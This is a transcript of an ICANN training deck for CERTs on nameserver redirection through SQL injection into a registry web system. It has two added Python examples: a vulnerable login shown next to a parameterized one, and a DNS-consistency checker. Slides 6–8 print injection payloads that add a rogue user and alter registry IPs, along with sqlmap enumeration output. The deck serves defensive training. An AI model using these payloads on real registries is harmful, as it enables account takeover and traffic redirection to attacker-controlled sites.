Day 2 Dns Cert 4b Name Server Redirection

Presentation by ICANN


  1. DNS Security for CERTs - Attack Scenarios & Demonstrations – NameServer Redirection
     Chris Evans, Delta Risk, LLC, 7 March 2010
  2. What You Will Need for the Exercise
     • Please watch the live demonstration in front
       – We will be targeting the web registry system
     • You may need your Ubuntu VM to:
       – Prior to the attack, verify the Web Registry System URL: http://www.tld1 points to
       – After the attack, determine where http://www.tld1 points to
  3. Description – NameServer Redirection
     • Change of Registration or Delegation Data
       – Intentional
         • Disgruntled employee changes registry data
         • Outsiders pretending to be a customer request an "update" to their account
         • Hackers change the registry database directly through web attacks
       – Accidental
         • Untrained employee
         • Typos in registry data
     Diagram: Domain1 NS, Domain2 NS, Domain3 NS -> Attacker now controls resolutions for Domain3
  4. Case Study
     • SQL Injection Tops the List of Data Breach Attacks
       – SQL Injection used in 60% of all data breach attacks, 19% of all security breaches on the Internet
       – Insecure programming techniques combined with the proliferation of web-based applications = trouble
       – Increase in automated techniques to detect and exploit vulnerabilities = double trouble
  5. Case Study
     • Summer of 2009: several African & Pacific ccTLD web-based registry systems were attacked through SQL injection
       – Attackers created new user accounts within the system
       – These accounts were used to modify existing registrations and re-delegate sites to malicious content
  6. Attack Demonstration
     Your website is designed to perform a query during a valid login attempt:
       SELECT * FROM table WHERE username='mike' AND password='!QAZ2wsx'
     SQL Injection… well… injects SQL statements into your backend database query. New SQL statement injected:
       SELECT * FROM table WHERE username='mike'; INSERT hacker INTO database --
     …the rest of the original SQL statement gets commented out by "--"
  7. Demonstration – Attacker View
     One single ' nets: table name and two variables
       ' group by srs_users.username having 1=1--
     Reconnaissance & table mapping...
       ';insert into srs_users values(101,'hacker','password')--
     Adds user hacker to the database…
  8. Demonstration – Attacker View (cont.)
     Use an SQL injection tool to gain a shell to the database (sqlmap):
       sql-shell> select * from srs_regs where fqdn='rogue.tld1'
       do you want to retrieve the SQL statement output? [Y/n] y
       [15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where fqdn='rogue.tld1''
       [15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
       [15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on system databases, sqlmap is going to use 'public' schema as database name
       [15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public'
       [15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public'
       [15:15:56] [INFO] retrieved: 9
       [15:15:57] [INFO] retrieved: regid
       [15:15:59] [INFO] retrieved: type
       [15:16:01] [INFO] retrieved: fqdn
       [15:16:03] [INFO] retrieved: ns
       [15:16:04] [INFO] retrieved: ip
       [15:16:06] [INFO] retrieved: recordtype
       [15:16:10] [INFO] retrieved: hostname
       [15:16:14] [INFO] retrieved: ownerid
       [15:16:17] [INFO] retrieved: parentid
     Enumerating the database… then update a record with a bad IP:
       '; update srs_regs set (ip)=('') where regid = 1 --
  9. Demonstration – Server View
  10. Demonstration – User View
      One minute you get the correct IP and website…
        ; <<>> DiG 9.5.1-P2 <<>> www.tld1
        ;; global options: printcmd
        ;; Got answer:
        ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
        ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
        ;; QUESTION SECTION:
        ;www.tld1. IN A
        ;; ANSWER SECTION:
        www.tld1. 180 IN A
        ;; AUTHORITY SECTION:
      …the next you're browsing whatever the hacker wants you to!
        ; <<>> DiG 9.5.1-P2 <<>> www.tld1
        ;; global options: printcmd
        ;; Got answer:
        ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392
        ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
        ;; QUESTION SECTION:
        ;www.tld1. IN A
        ;; ANSWER SECTION:
        www.tld1. 180 IN A
        ;; AUTHORITY SECTION:
  11. Impact
      • Registry suffers a public relations hit, potential loss of customers & revenue
      • Loss of brand reputation, customers, or revenue for registrants who are victimized
      • Effect of the attack persists even after detection and mitigation because of TTLs
  12. Mitigation & Response Strategies
      • SQL Injection
        – Practice secure coding principles in any web-based application that has database connectivity
        – Validate input and prevent "magic characters"
        – Use a Web Application Firewall to filter/validate the input to your web application
        – Use database logging to track queries and the pages they are being run on
        – Frequently audit your web applications (not just the systems they run on!)
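Added example, not code from the ICANN presentation: the slide-6 login query built by string concatenation beside a parameterized version, both run against a constructed in-memory SQLite table standing in for the registry's srs_users, using the injected username from slide 7. The table schema, the allow-list rule for "magic characters", and the use of executescript to imitate a driver that accepts stacked statements (as the demo's PostgreSQL backend did) are all assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the registry's user table (schema and rows are assumptions).
SCHEMA = """
CREATE TABLE srs_users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO srs_users VALUES (1, 'mike', '!QAZ2wsx');
"""

# The username value shown on slide 7: closes the quoted string, appends a
# statement, and comments out the rest of the original query with "--".
INJECTED_USERNAME = "mike'; insert into srs_users values(101,'hacker','password')--"

# Allow-list validation of usernames (slide 12); the exact rule is an assumption.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def valid_username(username):
    return USERNAME_RE.match(username) is not None


def login_vulnerable(conn, username, password):
    # Slide-6 query built by string concatenation. executescript imitates a
    # driver that runs stacked statements, so the injected INSERT executes.
    # Returns the SQL text that was sent to the database.
    query = ("SELECT userid FROM srs_users WHERE username='" + username
             + "' AND password='" + password + "'")
    conn.executescript(query)
    return query


def login_parameterized(conn, username, password):
    # Hardened form: placeholders bind the input as data, never as SQL text,
    # so the injected value is just a username that matches no row.
    row = conn.execute(
        "SELECT userid FROM srs_users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def user_count(conn):
    return conn.execute("SELECT COUNT(*) FROM srs_users").fetchone()[0]
```

Database logging as recommended on the slide would show the concatenated query text returned by login_vulnerable, which is how the extra INSERT becomes visible in an audit.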
  13. Mitigation & Response Strategies
      • Nameserver Redirection
        – Multi-factor authentication of changes
        – Out-of-band check of changes (e.g. phone, in-person)
        – Domain "locks" which prevent updates unless manually approved
        – Validation of changes before publishing new zone files
        – Processes for contacting ISPs to "clear" cached entries
        – Automated, continuous validation of published data with automated alerting
        – Also see ICANN SSAC Report SAC040
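Added example, not from the ICANN presentation, of the "automated, continuous validation of published data" item: it parses dig-style answers in the format shown on slide 10, compares them with the delegation data the registry believes it published, and emits one alert per mismatch, carrying the TTL so the responder knows how long the wrong answer will persist in caches (slide 11). The expected records and the observed dig output are constructed sample data.

```python
import re

# Constructed expected data as the registry's database should hold it
# (names and addresses are assumptions, not the demo's real records).
EXPECTED = {
    ("www.tld1.", "A"): {"192.0.2.10"},
    ("tld1.", "NS"): {"ns1.tld1.", "ns2.tld1."},
}

# Constructed dig-style answer for what a resolver returns after a tampered
# registry update redirected www.tld1 (same layout as the slide-10 output).
OBSERVED_DIG = """\
;; ANSWER SECTION:
www.tld1.\t180\tIN\tA\t198.51.100.77
tld1.\t3600\tIN\tNS\tns1.tld1.
tld1.\t3600\tIN\tNS\tns2.tld1.
"""

RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(\S+)$")


def parse_dig(text):
    """Collect resource records from dig output: (name, type) -> rdata set, plus TTLs."""
    records, ttls = {}, {}
    for line in text.splitlines():
        m = RR_LINE.match(line.strip())
        if not m:  # skips ";;" comment, header and question lines
            continue
        name, ttl, rtype, rdata = m.groups()
        key = (name.lower(), rtype.upper())
        records.setdefault(key, set()).add(rdata.lower())
        ttls[key] = max(ttls.get(key, 0), int(ttl))
    return records, ttls


def check_published(expected, dig_text):
    """Compare published answers with expected registry data; one alert per mismatch.

    Missing, extra and changed rdata all count. The TTL is included because
    cached wrong answers persist that long after the registry record is fixed.
    """
    observed, ttls = parse_dig(dig_text)
    alerts = []
    for key in sorted(set(expected) | set(observed)):
        want, got = expected.get(key, set()), observed.get(key, set())
        if want != got:
            alerts.append({"name": key[0], "type": key[1],
                           "expected": sorted(want), "observed": sorted(got),
                           "ttl": ttls.get(key)})
    return alerts
```

In practice the dig text would come from a scheduled query against several public resolvers as well as the registry's own authoritative servers, with non-empty alert lists routed to the CERT.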
  14. Mitigation & Response Strategies
      • Information Sharing
        – If you're the victim of an attack, share the details of the attack within the community
        – You may prevent someone else from becoming a victim
      As trusted entities, CERTs can encourage this type of exchange within their communities
  15. Questions?